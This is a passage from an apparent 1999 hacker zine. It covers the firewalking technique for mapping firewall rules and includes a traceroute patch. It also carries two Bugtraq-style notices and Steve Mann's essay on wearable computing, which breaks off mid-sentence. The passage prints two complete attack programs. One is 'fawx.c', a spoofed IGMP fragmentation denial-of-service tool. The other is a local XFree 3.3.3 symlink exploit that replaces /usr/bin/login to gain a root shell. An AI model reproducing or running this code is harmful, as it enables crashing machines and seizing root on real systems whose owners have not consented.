fact that the firewall does no content analysis, we can fool it into thinking our packets are DNS queries, and therefore, we can bypass the ACL. We simply begin our scan with a starting port number of: (target_port - (number_of_hops * num_of_probes)) - 1 If you are more then (target_port - 1) number of hops from your destination this method obviously will not work. For our above example this gives us: (53 - (8 * 3)) - 1 = 28 The probe that reaches the filter will have an acceptable port number as dictated by the firewall's ACL and will be allowed to pass unmolested (Figure 4). zuul:~>traceroute -p28 10.0.0.10 traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets 1 10.0.0.1 (10.0.0.1) 0.501 ms 0.399 ms 0.395 ms 2 10.0.0.2 (10.0.0.2) 2.433 ms 2.940 ms 2.481 ms 3 10.0.0.3 (10.0.0.3) 4.790 ms 4.830 ms 4.885 ms 4 10.0.0.4 (10.0.0.4) 5.196 ms 5.127 ms 4.733 ms 5 10.0.0.5 (10.0.0.5) 5.650 ms 5.551 ms 6.165 ms 6 10.0.0.6 (10.0.0.6) 7.820 ms 20.554 ms 19.525 ms 7 10.0.0.7 (10.0.0.7) 88.552 ms 90.006 ms 93.447 ms 8 10.0.0.8 (10.0.0.8) 92.009 ms 94.855 ms 88.122 ms 9 10.0.0.9 (10.0.0.9) 101.163 ms * * 10 * * * Figure 4 You will notice that the scan terminates immediately after the target port is passed. This is due to the fact that traceroute continues to increase the port numbers for each probe sent. The probe immediately after the successful one will be denied by the ACL on the firewall. To possibly get further, a simple modification to traceroute can be done to add a command line switch to stop port incrementation (Figure 5). This allows us to force every probe we send to be acceptable to the firewall's ACL (a side effect being that we might not get the normal ICMP unreachable message from the ultimate destination due to the fact that there might actually be something listening on the other end). See appendix A for the source code patch. zuul:~>traceroute -S -p53 10.0.0.15 traceroute to 10.0.0.15 (10.0.0.15), 30 hops max, 40 byte packets 1 10.0.0.1 (10.0.0.1) 0.516 ms 0.396 ms 0.390 ms 2 10.0.0.2 (10.0.0.2) 2.516 ms 2.476 ms 2.431 ms 3 10.0.0.3 (10.0.0.3) 5.060 ms 4.848 ms 4.721 ms 4 10.0.0.4 (10.0.0.4) 5.019 ms 4.694 ms 4.973 ms 5 10.0.0.5 (10.0.0.5) 6.097 ms 5.856 ms 6.002 ms 6 10.0.0.6 (10.0.0.6) 19.257 ms 9.002 ms 21.797 ms 7 10.0.0.7 (10.0.0.7) 84.753 ms * * 8 10.0.0.8 (10.0.0.8) 96.864 ms 98.006 ms 95.491 ms 9 10.0.0.9 (10.0.0.9) 94.300 ms * 96.549 ms 10 10.0.0.10 (10.0.0.10) 101.257 ms 107.164 ms 103.318 ms 11 10.0.0.11 (10.0.0.11) 102.847 ms 110.158 ms * 12 10.0.0.12 (10.0.0.12) 192.196 ms 185.265 ms * 13 10.0.0.13 (10.0.0.13) 168.151 ms 183.238 ms 183.458 ms 14 10.0.0.14 (10.0.0.14) 218.972 ms 209.388 ms 195.686 ms 15 10.0.0.15 (10.0.0.15) 236.102 ms 237.208 ms 230.185 ms Figure 5 - Taking it a bit further Since the magic of traceroute is all happening at the IP layer, any transport protocol (UDP, TCP and ICMP) can be used. The foundation laid down by traceroute can extend to any other protocol on top on IP. If we attempt to traceroute to a machine behind a firewall and the probe reaching the firewall is prohibited by an ACL filter, the packet will be dropped on the floor (in most cases). All we can determine from the traceroute scan is the last gateway (in this case, a firewall) that responded. This is good entropic information. This firewall can then become a waypoint that we use to determine the success of future probes. If we traceroute to a machine behind this firewall with a different (protocol) traceroute probe, and we get a response, we know two things: 1) that particular kind of traffic is passed by the firewall, and 2) we know a host behind the firewall. If we only get as far as our waypoint, we know that traffic type is filtered. This is the basis for firewalking. IV. Firewalking In order to use a gateway's response to gather information, we must know two pieces of information: - The IP address of the last known gateway before the firewalling takes place - The IP address of a host located behind the firewall. The first IP address serves as our metric (waypoint from the above example), if we can't get a response past that machine, then we assume that whatever protocol we tried to pass is being blocked3. The second IP address is used as a destination to direct the packet flow (Figure 6). [ image ] Using this technique, we can perform several different information gathering attacks. One attack is a firewall protocol scan, which will determine what ports/protocols a firewall will let traffic through on from the attacking host. This would attempt to pass packets on all ports and protocols and monitor the responses. A second potential threat is advanced network mapping. By sending packets to every host behind a packet filter, an attacker can generate an accurate map of a network's topology. V. Firewalk - The tool While traceroute is a useful application, it is not very extensible for any kind of serious reconnaissance scanning; to this end, the proof of concept tool, firewalk, was built. - Fire, walk with me where? Firewalk is a network-auditing tool that employs the techniques described above. It attempts determines what transport protocols a given gateway will let through. The firewalk scan works by sending out TCP or UDP packets with an IP TTL one greater then the targeted gateway. If the gateway allows the traffic, it will forward the packets to the next hop where they will expire and elicit a TTL exceeded in transit message. If the gateway host does not allow the traffic, it will likely drop the packets on the floor and we will see no response. By sending probes in a successive manner and recording which ones answer and which ones don't, the access list on the gateway can be determined. - 2 Phases To work its magic, firewalk has two phases, a network discovery phase, and a scanning phase. Initially, to get the correct IP TTL (that will result in expired packets one beyond the gateway) we need to 'ramp up' hop counts. We do TTL ramping in the same manner that traceroute works, sending packets out with successively incremented IP TTLs, towards the destination host. Once we know the gateway hopcount (at that point the scan is 'bound') we can move onto the next phase, the actual scan. The actual scan is simple. Firewalk sends out TCP or UDP packets and sets a timeout; if it receives a response before the timer expires, the port is considered open, if it doesn't, the port is considered closed (Figure 7). zuul:#firewalk -n -P1-8 -pTCP 10.0.0.5 10.0.0.20 Firewalking through 10.0.0.5 (towards 10.0.0.20) with a maximum of 25 hops. Ramping up hopcounts to binding host... probe: 1 TTL: 1 port 33434: [10.0.0.1] probe: 2 TTL: 2 port 33434: [10.0.0.2] probe: 3 TTL: 3 port 33434: [10.0.0.3] probe: 4 TTL: 4 port 33434: [10.0.0.4] probe: 5 TTL: 5 port 33434: Bound scan: 5 hops [10.0.0.5] port 1: open port 2: open port 3: open port 4: open port 5: open port 6: open port 7: * port 8: open 13 packets sent, 12 replies received Figure 7 - A Slow Walk As noted above, packets on an IP network can be dropped for a variety of reasons. When a packet is dropped for any reason other then it being denied by a filter, it is extraneous loss. For our firewalk scan to be accurate, we need to limit this extraneous packet loss to the best of our ability. The best we can do in most cases is to be redundant with the number of probes we send. Unless there is severe network congestion some of the probes should get through. However, what if the probe we send is filtered or dropped by a different gateway while en route to the target gateway (see figure 8). [ image ] To firewalk, this will look like the target gateway has denied the packet, which, in this case, is certainly a false negative. This is not extraneous loss, so simply sending more packets will not help. To prevent this, we must perform a `slow walk` or a `creeping walk`. This is akin to a normal scan, however we scan each hop en route to the target. We perform a standard firewalk ramping phase, and then scan each intermediate hop up to the destination. This allows prevents false negatives due to intermediate filter blockage and allows firewalk to be more confident in its report. The major benefit is that we can now determine if blocked ports are false negatives. The drawback is that it is, as it's name states, slow. More information about Firewalk (including the source) is available from http://www.es2.net/research/firewalk. VI. Risk Mitigation The easiest solution to this problem is to disallow ICMP TTL Exceeded messages from leaving an internal network. This will also have the effect of breaking valid uses of traceroute and may inhibit remote diagnostics of an internal network problem. Another defense against firewalking is the use of some form of proxy server. Network Address Translation (NAT) or any proxy server (both application level and circuit level) can prevent Firewalk from probing behind them. While network based intrusion detection tools could detect certain attacks [3]; it is possible to develop a version of Firewalk that would generate packets that would look like valid packets for each service that it is scanning. Currently, Firewalk only fills in the packet header and does not insert any data into a packet. A more sophisticated version could emulate various services in an attempt to masquerade as valid traffic and randomize the order and times that it scans services. Appendix A. traceroute static port diff Apply this diff to traceroute version 1.4a5 to add support for static destination ports. Apply the diff using the unix patch program from the traceroute source directory: ---------------------8<-------- traceroute.diff ------------------------------ --- traceroute.c.orig Fri Aug 21 15:15:23 1998 +++ traceroute.c Sun Aug 23 18:58:08 1998 @@ -289,6 +289,7 @@ int nprobes = 3; int max_ttl = 30; int first_ttl = 1; +int static_port = 0; u_short ident; u_short port = 32768 + 666; /* start udp dest port # for probe packets */ @@ -352,7 +353,7 @@ prog = argv[0]; opterr = 0; - while ((op = getopt(argc, argv, "dFInrvxf:g:i:m:p:q:s:t:w:")) != EOF) + while ((op = getopt(argc, argv, "dFInrvxf:g:i:m:p:q:Ss:t:w:")) != EOF) switch (op) { case 'd': @@ -406,6 +407,13 @@ options |= SO_DONTROUTE; break; + case 'S': + /* + * Tell traceroute to not increment the destination + * port, useful for bypassing some packet filters. + * Useless without the -p option. + static_port = 1; + break; case 's': /* * set the ip source address of the outbound @@ -744,7 +752,7 @@ register struct ip *ip; (void)gettimeofday(&t1, &tz); - send_probe(++seq, ttl, &t1); + send_probe(static_port ? seq : ++seq, ttl, &t1); while ((cc = wait_for_reply(s, from, &t1)) != 0) { (void)gettimeofday(&t2, &tz); i = packet_ok(packet, cc, from, seq); @@ -1300,9 +1308,9 @@ extern char version[]; Fprintf(stderr, "Version %s\n", version); - Fprintf(stderr, "Usage: %s [-dFInrvx] [-g gateway] [-i iface] \ -[-f first_ttl] [-m max_ttl]\n\t[ -p port] [-q nqueries] [-s src_addr] [-t tos] \ -[-w waittime]\n\thost [packetlen]\n", + Fprintf(stderr, "Usage: %s [-dFInrSvx] [-g gateway] [-i iface] \ +[-f first_ttl]\n\t[-m max_ttl] [ -p port] [-q nqueries] [-s src_addr] \ +[-t tos]\n\t[-w waittime] host [packetlen]\n", prog); exit(1); } ---------------------8<-------- traceroute.diff ------------------------------ Appendix B. References [1] Y. Rekhter, B. Moskowitz, D. Karrenberg, G. J. de Groot and E. Lear, "Address Allocation for Private Internets" RFC1918, February 1996 [2] Van Jacobson, traceroute documentation and source code, Lawrence Berkeley National Laboratory [3] Thomas H. Ptacek and Timothy Newsham, "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection", Secure Networks, January 1998 1 In fact, in the traceroute dumps, the original RTTs (round-trip times) are left in as they appeared. 2 Traceroute version 1.4a5 (ftp://ee.lbl.gov/traceroute1.4a5.tar.Z) allows for ICMP echo based traceroutes via the -I flag. Windows NT's version of traceroute 'tracert' exclusively uses ICMP echoes. 3 It should be noted that the assumption that it is our target gateway that is dropping the traffic may not be correct. There are several things that could cause a false positive in this case: - A host could also be down or simply not responding. - IP is unreliable. Packets can be dropped for any number of reasons. - The packet could also be dropped by a previous filtering gateway before it ever reaches our target gateway host. 4 It is significant to note that the ultimate destination host does not have to be reached. It just needs to be somewhere downstream, on the other side of the gateway from the firewalking host. 5 If an intermediate filter is shown to drop packets, this prevents firewalk from scanning the actual target machine for the blocked packet type, on that route. This is annoying. EOF @HWA 16.0 IGMP+8 fragmentation attack for Linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* fawx.c v1 by ben-z -- igmp-8+frag attack for linux * * thanks to datagram for ssping.c - helped lots * * -------------------------------------------------- * * DESCRIPTION: * * Sends oversized fragmented IGMP packets to a box * * either making it freeze (WinNT/9x), or lagging * * it to hell and back. Since most win32 firewalls * * dont support IGMP, the attack successfully * * penetrates into the system, making it much more * * effective than an ICMP attack which is likely to * * be filtered. * * GREETINGS: * * mad props to datagram for writing ssping, also * * thanks to #fts(2) on undernet and the psychic * * crew on efnet. shouts to ka0z, cyrus, magicfx, * * ice-e, zeronine, soupnazi, benito, eklipz, c0s, * * metalman, chawp, folk, atomic-, dethwish, sindawg * * mosthated, and everyone on irc.slacknet.org.. */ #include #include #include #include #include #include #include #include #include #include #include #include void banner(void) { printf(" -----------------------------------------------\n"); printf("| fawx v1 by ben-z: igmp-8+frag spoofing attack |\n"); printf(" -----------------------------------------------\n"); } void usage(const char *progname) { printf("[**] syntax: %s \n",progname); } int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family = AF_INET; addr->sin_addr.s_addr = inet_addr(name); if (addr->sin_addr.s_addr == -1) { if (( host = gethostbyname(name) ) == NULL ) { fprintf(stderr,"\nuhm.. %s doesnt exist :P\n",name); return(-1); } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port = htons(port); return(0); } unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } int send_fawx(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct igmphdr *igmp; int rc; packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip = (struct iphdr *)packet; igmp = (struct igmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->ihl = 5; ip->version = 4; ip->id = htons(34717); ip->frag_off |= htons(0x2000); ip->ttl = 255; ip->protocol = IPPROTO_IGMP; ip->saddr = spoof_addr; ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); igmp->type = 8; igmp->code = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct igmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->frag_off = htons(8 >> 3); ip->frag_off |= htons(0x2000); ip->check = in_cksum(ip, sizeof(struct iphdr)); igmp->type = 0; igmp->code = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct igmphdr) + 8,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } free(packet); /* printf("."); <- it looked way too ugly :P */ return(0); } int main(int argc, char * *argv) { struct sockaddr_in dest_addr; unsigned int i,sock; unsigned long src_addr; banner(); if ((argc != 4)) { usage(argv[0]); return(-1); } if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf(stderr,"error opening raw socket. \n"); return(-1); } if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } src_addr = dest_addr.sin_addr.s_addr; if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); } printf("[**] sending igmp-8+frag attacks to: %s.",argv[2]); for (i = 0;i < atoi(argv[3]);i++) { if (send_fawx(sock, src_addr, &dest_addr) == -1) { fprintf(stderr,"error sending packet. \n"); return(-1); } usleep(10000); } printf(" *eof*\n"); } @HWA 17.0 Local XFree 3.3.3 symlink root compromise..(freeBSD+others)...... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /*** local XFree 3.3.3-symlink root-compromise. *** Tested under FreeBSD 3.1 (but should work on others 2) *** (C) 1999/2000 by Stealthf0rk for the K.A.L.U.G. *** (check out http://www.kalug.lug.net/stealth or /coding for *** other kewl stuff!) *** *** FOR EDUCATIONAL PURPOSES ONLY!!! USE IT AT YOUR OWN RISK. *** Even if this program restores all, you should backup your *** login before running this. ***/ #include #include #include #include #define LOGIN "/usr/bin/login" #define TELNET "/usr/bin/telnet" int cp(const char*, const char*, int); int main(int argc, char **argv) { char *telnet[] = {TELNET, "localhost", NULL}; char *shell[] = {"/bin/sh", NULL}; char *X[] = {"/usr/X11R6/bin/xinit", NULL}; FILE *f = NULL; int p = 0; char buf[1000] = {0}; /* the rootshell */ if (!geteuid() || !getuid()) { unlink(LOGIN); cp("/tmp/L", LOGIN, 1); chmod(LOGIN, 04555); printf("Welcome!\n"); unlink("/tmp/.X11-unix"); unlink("/tmp/L"); execve(*shell, shell, NULL); } /* back up */ cp(LOGIN, "/tmp/L", 1); if (symlink(LOGIN, "/tmp/.X11-unix") < 0) { perror("symlink (/tmp/.X11-unix)"); exit(errno); } if ((p = fork()) < 0) { perror("fork"); exit(errno); } else if (p > 0) { sleep(7); kill(p, 9); cp(argv[0], LOGIN, 1); execve(telnet[0], telnet, NULL); perror("fatal:"); } else { printf("Xfree 3.3.3 root-sploit by Stealth. http://www.kalug.lug.net\n"); printf("\n-> Please give me some seconds... <-\n\n"); execve(X[0], X, NULL); } return 0; } int cp(const char *from, const char *to, int how) { int in = 0, out = 0, r = 0; char buf[1000] = {0}; printf("cp %s %s\n", from, to); /* overwrite ? */ if (how == 1) how = O_RDWR|O_TRUNC|O_CREAT; else how = O_RDWR|O_CREAT; if ((out = open(to, how)) < 0) { perror("open 1"); exit(errno); } if ((in = open(from, O_RDONLY)) < 0) { perror("open 2"); exit(errno); } while ((r = read(in, buf, 1000-1)) > 0) { write(out,buf,r); memset(buf,0,1000); } close(in); close(out); return 0; } @HWA 18.0 Microsoft Outlook Express internet zone vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 26 Apr 1999 05:07:19 -0700 From: "1nternal @geocities.com" <1nternal@MY-DEJANEWS.COM> To: BUGTRAQ@netspace.org Subject: Minor privacy exploit in Outlook Express Outlook Express uses HTML to display ceratin information in the 'outlook today' type part of outlook express, ie, the number of unread messages in your inbox etc... Because it is considered to be in the 'internet zone', this information needs to be safely scriptable, thus it can be accessed by any site in this zone. This allows for a possible (although admittedly minor) privacy and possibly security problem. The 'problem' lies in the 'OutlookExpress.MessageList' ActiveX control, which is marked safe for scripting, it allows for counting the number of messages in any folder within outlook express, as well as the number of unread items and a few other things, such as setting options, however, the options are only set for that instance only and are not saved. An example of viewing the number of messages in a folder, as well as previewing the message (creating the file 'C:\oe_prev$.eml' without the users permission). It should be noted that this preview message is not accessible remotely(without an exploit). Obviously, this could also be done in JavaScript, however it would still require activeX support and OE5. 1nternal@my-dejanews.com @HWA 19.0 Big Brother 1.09b/c security notice. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 26 Apr 1999 06:49:59 -0400 From: Sean MacGuire To: BUGTRAQ@netspace.org Subject: FW: Security Notice: Big Brother 1.09b/c http://www.maclawran.ca/bb/ for more info on Big Brother. -----FW: <199904261049.GAA07967@www.maclawran.ca>----- Date: Mon, 26 Apr 1999 06:49:59 -0400 (EDT) >From: Sean MacGuire To: solo@dok.org Subject: Security Notice: Big Brother 1.09b/c This notice concerns the Big Brother System and Network Monitor. We noticed you downloaded a version which could be affected by this problem so we wanted to tell you about it. If you have any questions or concerns, feel free to contact me at mailto:sean@maclawran.ca. Sorry for any inconvenience. =========================== Big Brother Security Notice =========================== Versions: 1.09b and 1.09c Module: CGI History module (web/bb-hist.sh) Affects: Anyone who's installed the new history viewer bb-hist.sh as a CGI program. Summary: Exploiting the problem could allow the partial display of local files provided they are readable by your web server, and text-based. Fix: Please pick up a new version of the bb-hist.sh file at: http://maclawran.ca/bb-dnld/bb-hist.sh Found by: Michael Smith Thanks Michael. I've also updated the archive to be 1.09d (this is the only change). -- Sean MacGuire, Reality Engineer sean@MacLawran.ca The Big Brother Ministry of Truth http://maclawran.ca/sean icbm --> 45'31.06N-73'35.19W +1 514 982 9688 "Looking down the barrel of another day" --------------End of forwarded message------------------------- @HWA 20.0 Cyborg Seeks Community ~~~~~~~~~~~~~~~~~~~~~~ May/June 1999 - Original URL - http://www.techreview.com/articles/may99/mann.htm Cyborg Seeks Community Meet one of the creators of wearable computing and join him in his search for like-minded folks to live in an augmented reality. By Steve Mann People find me peculiar. They think it’s odd that I spend most of my waking hours wearing eight or nine Internet-connected computers sewn into my clothing and that I wear opaque wrap-around glasses day and night, inside and outdoors. They find it odd that to sustain wireless communications during my travels, I will climb to the hotel roof to rig my room with an antenna and Internet connection. They wonder why I sometimes seem detached and lost, but at other times I exhibit vast knowledge of their specialty. A physicist once said he felt that I had the intelligence of a dozen experts in his discipline; a few minutes later, someone else said they thought I was mentally handicapped. Despite the peculiar glances I draw, I wouldn’t live any other way. I have melded technology with my person and achieved a higher state of awareness than would otherwise be possible. I see the world as images imprinted onto my retina by rays of light controlled by several computers, which in turn are controlled by cameras concealed inside my glasses. Every morning I decide how I will see the world that day. Sometimes I give myself eyes in the back of my head. Other days I add a sixth sense, such as the ability to feel objects at a distance. If I’m going to ride my bicycle, I’ll want to feel the cars and trucks pressing against my back, even when they are a few hundred feet away. Things appear different to me than they do to other people. I see some items as hyperobjects that I can click on and bring to life. I can choose stroboscopic vision to freeze the motion of rotating automobile tires and see how many bolts are on the wheels of a car going over 60 miles per hour, as if it were motionless. I can block out the view of particular objects—sparing me the distraction, for example, of the vast sea of advertising around me. I live in a videographic world, as if my entire life were a television show. And many people assume that by living my life through the screen, I do exactly what television leads us to do—tune out reality. In fact, WearComp has quite the opposite effect: Visual filters help me concentrate on what is important, heightening my sensitivity and setting my imagination free. I do of course have occasion to remove my computational prostheses, as when I sleep, shower or splash around in the ocean. In addition to having the Internet and massive databases and video at my beck and call most of the time, I am also connected to others. While I am grocery shopping, my wife—who may be at home or in her office—sees exactly what I see and helps me pick out vegetables. She can imprint images onto my retina while she is seeing what I see. I hope to add to the population of similarly equipped people; last fall at the University of Toronto, I taught what I believe to be the world’s first course for cyborgs (see sidebar “School for Cyborgs). Much of my passion has been fueled by a desire to restore some balance of privacy in a world where individuals are increasingly affronted by government surveillance and corporate encroachments. In fact, one goal of my work was to challenge the notion of totalitarian video surveillance—the now-common practice of a corporate or governmental establishment wishing to know everything about everyone in the establishment while revealing nothing about itself. Many department stores, for example, use large numbers of hidden cameras and yet prohibit customers from taking pictures. I attempted to draw attention to this phenomenon of unreciprocated video surveillance in Shooting Back, a documentary I made during my day-to-day life in several different countries over a period of many years. Whenever I found myself in a store or some other establishment with electronic eyes perusing the premises, I asked its management why they were taking pictures of me without my permission. They would typically ask me why I was so paranoid and tell me that only criminals are afraid of cameras. Of course I was covertly recording this response using my own hidden eyetap video camera. Then I would pull an ordinary camcorder out of my satchel and give them a chance to explain their position for the record. (The camcorder was simply a prop, of course, as the eyetap camera had been capturing the scene.) The same people who claimed that only criminals were afraid of cameras had an instantly paranoid (and sometimes violent) reaction to my camcorder. Shooting Back was, I believe, the first documentary to be transmitted in real time to the World Wide Web while it was shot. (Selected portions of Shooting Back may be viewed at http://wearcam.org/shootingback.html.) Ahead of My Time Growing up during the 1960s and early 1970s, I always seemed to be creating things before their time. I grew up in Hamilton, Ontario—a city on the western tip of Lake Ontario about 100 kilometers from Toronto. I came by this inclination naturally; during the early 1950s, my father had built what was perhaps the first wearable radio. (He had pursued radio as a hobby since his childhood.) He had taught me quite a bit about electronic circuits by the time I started kindergarten. As a young child, I removed the head from a portable battery-powered dictating machine and replaced it with the head from a high-fidelity audio cassette deck. From this cassette transport mechanism, I built a system that enabled me to listen to music while walking around. While many people scoffed at this invention, I found it nice to be able to drown out background music while shopping, to assert my own idea of personal space, and to defend myself from theft of my solitude by the department stores with their Muzak. In my teens I founded a concept of mediated reality, which I called “lightspace. The goal of lightspace was to experience an altered perception of visual reality by exploring a large range of possible forms of illumination while observing a scene or object from different viewpoints. My work with lightspace led to the invention of my wearable computer. My desire to create photographic instruments that would function as true extensions of my mind and body—and my desire to control these photographic instruments in new ways—created a need for the ability to program complex sequences of events. I began to take this matter seriously, building a digital computer from a large number of electronic components salvaged from an old telephone switching computer. I did much of this experimentation in the basement of a television repair shop where I spent much of my childhood as a volunteer, fixing TV sets. In this shop I built up a great deal of knowledge about electronic circuits. The result of my early efforts was, in the early 1970s, a family of wearable computers I called “WearComp0. Sometimes I took these cumbersome prototypes outside in search of spaces dark enough to explore the altered perception of visual reality I could create using portable battery-powered light sources. People would cross the street to avoid me, not knowing what to make of what must have looked to them like an alien creature. The rig was physically a burden, weighing as much or more than I did. After wearing one of these encumbrances from sundown (when it got dark enough to use them) to sunrise, my feet would be swollen, blistered and bleeding. I continued to refine WearComp0 and its evolutionary successor, WearComp1. After much tinkering, I came up with WearComp2—my first system that truly qualified as a wearable computer in the sense that it was not just a special purpose device. WearComp2 was field programmable, with a full-function input device (a keyboard and joystick for cursor control both built into the handle of an electronic flashgun), text and graphical displays, sound recording and playback (crude, home-brew analog-to-digital and digital-to-analog converters), and a wireless data connection to provide links to other computers. I completed this system in 1981, before most of the world realized that computers could be portable, much less wearable. Though an advance over my earlier prototype, WearComp2 was still a burden to lug. I wanted to reduce its bulk and make it look more normal. This goal led me in 1982 to experiment with building components directly into clothing. I learned how to make flexible circuits that could be embedded into ordinary fabric. This work enabled me to make versions of WearComp that were not only more comfortable to walk around in but also less off-putting to others. In spite of these advances, my life as a cyborg remained mostly solitary. I did connect quite literally (by serial data cable) with an understanding woman during my freshman year at McMaster University in my hometown of Hamilton. We faced unusual challenges in this configuration, such as having to choose which public restroom to use when we were joined. Thinking back, I imagine we must have made a comical sight, trying to negotiate doorways without snagging the cable that tethered us together. Such relationships were rare, and it was seldom that I could get others to wear my seemingly strange contraptions. Many people were unable to get past my technological shell, which they apparently found more than a little odd. Still, multimediated reality had provided me with a unique vision of the world, and by the mid-1980s I had a following of people on the fringes of society who shared (or at least appreciated) my vision. I was invited to shoot pictures for album covers and hair ads. By 1985, I began to realize that it wasn’t just the finished photographs people wanted; they also seemed to enjoy watching me take the pictures. Often I would be shooting in large warehouses, with audiences of hundreds of people. I began to realize that I had become a cyborg performance artist. By the end of the 1980s, however, I found myself yearning to return to my more substantive childhood passions for science, mathematics and electrical engineering. While at McMaster, I added biosensors to the WearComp so that it could monitor my heart rate (as well as the full EKG waveform) and other physiological signals. I also invented the “vibravest—a garment studded with radar transceivers and vibrating elements. Wearing this vest made objects at a distance feel as if they were pressing against my body. I could close my eyes and walk down the hallway, confident that any wall or other obstacle would be felt as warning vibrations on the appropriate side of the vest. By sparing myself from the cognitive load of processing all that visual information, I found I was able to think more clearly. In 1991, I brought my inventions to MIT as a PhD student. As a cyborg, uprooting myself from Canada was a formidable task, since I had installed my cyberbody in Canada over a period of many years. Going to MIT was a sudden move of my extended self. First, I secretly climbed up onto the rooftops of buildings around the city to put in place the wireless data communications infrastructure I had brought with me from Canada. I had to quickly deploy my base stations at the top of elevator shafts or anywhere else I could find warm dry places. This way, whenever I wanted an Internet connection, these gateways would be ready to send the data to me, no matter where I was—even if I was in a basement or riding on the subway. Although I kept in touch with my family through cyberspace, my first two years at MIT were lonely times IRL—in real life. I was, after all, the only person there with a wearable computer. Then in 1993, at the request of a fellow student, a local engineer named Doug Platt built a wearable system. I was no longer the only cyborg at MIT. It took some years to get other cyborgs at MIT, thus enabling the beginnings of a sense of community. Although I never succeeded in getting a large community outfitted with my high-speed packet radio systems, the cellular telephones that began to emerge provided another answer to the problem of connectivity. By the end of 1995, my work was attracting serious academic interest. I was asked to write an article about my work for IEEE Computer, a publication of the Institute of Electrical and Electronics Engineers’ Computer Society. I also proposed an academic symposium on wearables and was referred to T. Michael Elliott, executive director of the Computer Society. I figured that such a conference would legitimize the field, which until then had consisted in many people’s minds of “Steve, that crazy guy running around with a camera on his head. Elliott was enthusiastic about the idea and in 1996 the Computer Society responded with an overwhelming “yes. This marked a turning point in my acceptance by my professional peers. More than 700 people attended this first IEEE-sponsored symposium on wearable computing, held in Cambridge, Mass., in October 1997. A gala “Wearables event the following day drew 3,000 people. In that same year I received my doctorate from MIT in wearable computing. This was a gratifying culmination: I had turned a childhood hobby and passion into an MIT project, the topic of a conference, and a PhD dissertation. This past year I returned to Canada to pursue my work at the University of Toronto. Why Toronto? I had lived there in the mid-1980s, and the city had seemed very “cyborg-friendly. I had sensed there a cosmopolitan diversity as well as a genuine warmth and openness that contrasted with the more cyborg-hostile and tense atmosphere of some large U.S. cities. Wearing Well Although I spent many years developing WearComp in relative isolation, I welcome efforts to commercialize wearable computers. At the vanguard is Xybernaut, based in Fairfax, Va. Xybernaut’s latest model is being manufactured by Sony, indicating that the Japanese electronics giant has an interest in what some believe will become the Walkman of computing. Last May, Xybernaut organized its own conference on wearable computing (and invited me to give the keynote address). I may also begin to license some embodiments of my original WearComp, as well as many of my more recent innovations, to companies who want to manufacture commercial systems. I think it will be especially important to make the cyborg outfit less cumbersome—something that’s long been a goal of mine. My latest version is quite sleek, and looks just like ordinary bifocal eyeglasses, with the eyetap point hidden along the cut line. Even when fully rigged, I can still play an acceptable game of squash. I realize that some people see me and my invention as a potential threat—like the Borg of Star Trek fame: “You will be assimilated. Clearly, there are important philosophical issues to be explored. Not only is there the danger of the technology being used to monitor people to make them into obedient productive cyborgs, but there is also the potential that people will become too dependent on this technology. My goal as a responsible inventor and engineer, however, has always been to encourage the development and manufacture of wearable computers as a means of personal, not institutional, empowerment. That will make worthwhile all the obstacles and challenges I have faced during my more than 20 years of developing this technology. I hope that if I bring WearComp to market, anyone who wishes to will eventually be able to become a cyborg. We’ll live in a collaborative computer-mediated reality that will allow us to no longer need to distinguish between cyberspace and the real world. And then this cyborg will have lots of company. Steve Mann is a professor of electrical and computer engineering at the University of Toronto. Links Wearcomp.org: This is ground zero for Steve Mann’s world of wearable computing. It includes links to his papers and conference presentations, as well as photos of his present and early wearable gear. http://www.wearcomp.org/ The MIT Wearable Computing Web site. Information on MIT’s work as well as a good set of links to other organizations, both commercial and academic. http://wearables.www.media.mit.edu/projects/wearables/ Wearable Computer Systems at Carnegie Mellon University. http://www.cs.cmu.edu/afs/cs.cmu.edu/project/vuman/www/home.html Augmented reality research at Columbia University’s computer graphics and user interfaces lab. http://www.cs.columbia.edu/graphics/ Georgia Tech wearables page. http://wearables.gatech.edu/ International Symposium on Wearable Computers (ISWC). Archives of ISWC97 and ISWC98, and information about the upcoming ISWC99. http://iswc.gatech.edu/ Wearables research at the University of Washington's Human Interface Technology (HIT) Lab. http://www.hitl.washington.edu/projects/wearables/ University of Oregon’s wearable computing research group. http://www.cs.uoregon.edu/research/wearables/Oregon/ Xybernaut’s home page. http://www.xybernaut.com Wearable Webcrawler: This "wearable specific search index" is a comprehensive set of links to wearable computing resources on the Web. http://wearables.gatech.edu/webcrawler.htm Wearables Central: Contains archives of the Usenet newsgroup comp.sys.wearables and of the mailing 